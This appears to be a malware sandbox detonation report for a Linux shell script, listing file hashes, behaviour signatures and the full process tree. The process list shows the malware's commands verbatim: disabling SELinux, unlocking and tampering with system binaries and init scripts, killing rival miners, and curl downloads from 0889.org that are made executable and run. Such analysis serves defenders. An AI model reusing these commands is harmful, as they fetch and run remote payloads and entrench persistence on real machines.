SHA1 5d767b14666d82389475868f153a38594acce7ae
SHA256 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2
SHA512 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440

/etc/init.d/sed1G2Nou

MD5 03975a59225fad7d7c28e133de85d249
SHA1 6f72b3b528550f16a2109bc9d86004180d7d734f
SHA256 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65
SHA512 e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e

/etc/init.d/sedKYm7AI

MD5 510488b5120b580b673a15b75a5498b0
SHA1 0f667545ae788ae46ccc7045dc7975f044a76fd2
SHA256 a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26
SHA512 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821

/etc/init.d/sedkEQzHQ

MD5 85d7a3783889ea93dcda2fb488420c1c
SHA1 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c
SHA256 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0
SHA512 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9

/etc/init.d/sedO2yYB2

MD5 ec9a7d183ec50837a12aca3f9c95cc27
SHA1 396a23fa1d6e8a871d69786d14fd1ce4e4cba583
SHA256 c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0
SHA512 ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b

/etc/init.d/sedNfkxxe

MD5 0eb380bbeb5db57a59e298a074f1f9f3
SHA1 284b88849b3dfd7f6c02c0d05c77a01292c8a679
SHA256 f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2
SHA512 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88

/etc/init.d/sedqz14Ln

MD5 1ca5c0743fa797ffa364db95bb8d8d8e
SHA1 6de496930dfe00e705fa244d77e7dfa2d1c6aef8
SHA256 a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609
SHA512 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f

/etc/init.d/sedxXliUx

MD5 b868200c6e36ef87e27ead9a3ddad2db
SHA1 b1cc85e63d4302b020a4679971b6c363c9392d63
SHA256 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1
SHA512 f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a

/etc/init.d/sedEf5nzK

MD5 82698019c962069b438bd2a82d9fa1e7
SHA1 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305
SHA256 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7
SHA512 dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9

/etc/init.d/sedJgobeX

MD5 27013efdfe13470845c70a9e00a61fde
SHA1 2b840ac1a1d1b866ba457bd0746144c431e944ad
SHA256 c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0
SHA512 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d

/etc/init.d/sedQAct27

MD5 49fbfd237be2a2f09576f1f9374580be
SHA1 e380716a856a90f5643ddd6f3655020fc2f603dd
SHA256 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e
SHA512 b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea

memory/694-1-0xb6c30000-0xb6c41044-memory.dmp

/etc/init.d/sedxJDWUg

MD5 08213cf202f2552298f62a007487e01c
SHA1 1f143ee220797f30367d4de9e65ad9ac52fd8ea4
SHA256 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e
SHA512 b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33

/etc/init.d/sed3w2aIn

MD5 019ab1c1cb24b368b0965898746bb122
SHA1 8146b37003a86a1348c6b165b32a247ce6907525
SHA256 deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818
SHA512 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a

/etc/init.d/sedQjVLAv

MD5 338975eb635877703fc066e005f916d9
SHA1 5474296634bf9e527a9a865b0cb182e61a2b66bf
SHA256 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7
SHA512 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8

/etc/init.d/sedjSL3gO

MD5 69497d0565055f626ee2bc84f818ce0f
SHA1 b5ca73e0fef84a5aa8f0155f160952c4385045b8
SHA256 5416ce07a0caf57f145d8f4f07e036d2decd72023e649f782d30be599ddf20da
SHA512 23d14d2c9f3356242a56f2716bd79d31f6c8a936c7a581d4b472ca126113a6b589f4ceb37816178b17ca09f508f196009ffcb390d349302a54dee0644f995bec

/etc/init.d/sedAWxBX7

MD5 e4da2ae5c153148fad0b3f6e5e7ce61e
SHA1 3ef89c60b9f66bad7834dc5621772d474e3e36d9
SHA256 373a932050d1fd4912c80fff5b941e49d37bf9899d156b524c6404f1c76e3923
SHA512 dff5193df49f6e639d76f38d0a45cd68efec5e6d4ee06801d732cdb1e3ca7057820be046fba05e13d07d934f248773df246760b6288b9753abe067f268d7cc10

/etc/init.d/sed4Pejsj

MD5 4bf46072f9f13b2e38d58a053def37d5
SHA1 94e4b56f7a5d40a40f256a474e244642ad778a4e
SHA256 a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf
SHA512 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de

memory/742-2-0xb6bd9000-0xb6bea044-memory.dmp

memory/764-3-0xb6bfd000-0xb6c0e044-memory.dmp

/tmp/sh-thd.QtKxCq

MD5 2ff9930962f5ed39a68bfabddc3551ac
SHA1 9f99fbefee4a609f403025ed510c2fa93982303b
SHA256 d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7
SHA512 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df

/etc/init.d/crontabs

MD5 f21f5717d956b60f695d350bbab05716
SHA1 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f
SHA256 c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e
SHA512 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

17s

Max time network

19s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /usr/local/sbin/mcron /usr/local/sbin/mcron N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /bin/sed N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sed7tinrF /bin/sed N/A
File opened for modification /etc/init.d/sedMwLA8Q /bin/sed N/A
File opened for modification /etc/init.d/sed88r4Bk /bin/sed N/A
File opened for modification /etc/init.d/sed2KPZCO /bin/sed N/A
File opened for modification /etc/init.d/sedas3nbc /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedqUuL8d /bin/sed N/A
File opened for modification /etc/init.d/sedvbNyP4 /bin/sed N/A
File opened for modification /etc/init.d/sed0q5Utk /bin/sed N/A
File opened for modification /etc/init.d/sedv6RR3s /bin/sed N/A
File opened for modification /etc/init.d/sedAnGcRa /bin/sed N/A
File opened for modification /etc/init.d/grub /usr/bin/curl N/A
File opened for modification /etc/init.d/sedvdRSWB /bin/sed N/A
File opened for modification /etc/init.d/sedwN5x5f /bin/sed N/A
File opened for modification /etc/init.d/sedoUuasG /bin/sed N/A
File opened for modification /etc/init.d/sedL7L6fV /bin/sed N/A
File opened for modification /etc/init.d/sedkajU1t /bin/sed N/A
File opened for modification /etc/init.d/sedx1ab42 /bin/sed N/A
File opened for modification /etc/init.d/sed2x3uAc /bin/sed N/A
File opened for modification /etc/init.d/sed3ewBKk /bin/sed N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/local/sbin/mcron /usr/bin/curl N/A
File opened for modification /usr/bin/bsd-port/knerl /usr/bin/curl N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/715/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/cmdline /usr/bin/pkill N/A
File opened for reading /proc/698/cmdline /usr/bin/pkill N/A
File opened for reading /proc/385/cmdline /usr/bin/pkill N/A
File opened for reading /proc/378/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/pkill N/A
File opened for reading /proc/320/status /usr/bin/pkill N/A
File opened for reading /proc/111/status /usr/bin/pkill N/A
File opened for reading /proc/4/status /usr/bin/pkill N/A
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/710/cmdline /usr/bin/pkill N/A
File opened for reading /proc/740/status /usr/bin/pkill N/A
File opened for reading /proc/710/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/235/status /usr/bin/pkill N/A
File opened for reading /proc/37/status /usr/bin/pkill N/A
File opened for reading /proc/672/status /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/323/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/status /usr/bin/pkill N/A
File opened for reading /proc/323/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/154/cmdline /usr/bin/pkill N/A
File opened for reading /proc/378/status /usr/bin/pkill N/A
File opened for reading /proc/677/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/79/status /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/320/cmdline /usr/bin/pkill N/A
File opened for reading /proc/672/status /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A
File opened for reading /proc/323/status /usr/bin/pkill N/A
File opened for reading /proc/414/status /usr/bin/pkill N/A
File opened for reading /proc/704/cmdline /usr/bin/pkill N/A
File opened for reading /proc/235/status /usr/bin/pkill N/A
File opened for reading /proc/122/status /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/121/status /usr/bin/pkill N/A
File opened for reading /proc/356/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/121/status /usr/bin/pkill N/A
File opened for reading /proc/16/cmdline /usr/bin/pkill N/A
File opened for reading /proc/20/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/111/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/668/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.y06k78 /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.zmSXlf /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/bin/mount

[mount]

/bin/grep

[grep -o /proc/[0-9]\+]

/usr/bin/sort

[sort -u]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

/bin/chmod

[chmod +x /usr/local/sbin/mcron]

/usr/bin/chattr

[chattr +ia /usr/local/sbin/mcron]

/usr/bin/dirname

[dirname /usr/bin/bsd-port/knerl]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]

/bin/chmod

[chmod +x /usr/bin/bsd-port/knerl]

/usr/bin/chattr

[chattr +ia /usr/bin/bsd-port/knerl]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]

/bin/chmod

[chmod +x /etc/init.d/grub]

/usr/bin/chattr

[chattr +ia /etc/init.d/grub]

/usr/local/sbin/mcron

[/usr/local/sbin/mcron]

Network

Country Destination Domain Proto
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp

Files

/etc/seduED3iV

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512 d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

/etc/init.d/sedqUuL8d

MD5 9b392bac8c24330ad47478a5038ead13
SHA1 6c3050598d168c42dc688cecb77fe478211c3ab9
SHA256 d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f
SHA512 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462

/etc/init.d/sed7tinrF

MD5 ce2de503acc3de02f544571e89d4d717
SHA1 5d767b14666d82389475868f153a38594acce7ae
SHA256 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2
SHA512 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440

/etc/init.d/sedMwLA8Q

MD5 03975a59225fad7d7c28e133de85d249
SHA1 6f72b3b528550f16a2109bc9d86004180d7d734f
SHA256 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65
SHA512 e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e

/etc/init.d/sedvbNyP4

MD5 510488b5120b580b673a15b75a5498b0
SHA1 0f667545ae788ae46ccc7045dc7975f044a76fd2
SHA256 a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26
SHA512 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821

/etc/init.d/sed0q5Utk

MD5 85d7a3783889ea93dcda2fb488420c1c
SHA1 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c
SHA256 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0
SHA512 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9

/etc/init.d/sed88r4Bk

MD5 ec9a7d183ec50837a12aca3f9c95cc27
SHA1 396a23fa1d6e8a871d69786d14fd1ce4e4cba583
SHA256 c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0
SHA512 ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b

/etc/init.d/sedvdRSWB

MD5 0eb380bbeb5db57a59e298a074f1f9f3
SHA1 284b88849b3dfd7f6c02c0d05c77a01292c8a679
SHA256 f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2
SHA512 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88

/etc/init.d/sed2KPZCO

MD5 1ca5c0743fa797ffa364db95bb8d8d8e
SHA1 6de496930dfe00e705fa244d77e7dfa2d1c6aef8
SHA256 a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609
SHA512 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f

/etc/init.d/sedx1ab42

MD5 b868200c6e36ef87e27ead9a3ddad2db
SHA1 b1cc85e63d4302b020a4679971b6c363c9392d63
SHA256 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1
SHA512 f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a

/etc/init.d/sed2x3uAc

MD5 82698019c962069b438bd2a82d9fa1e7
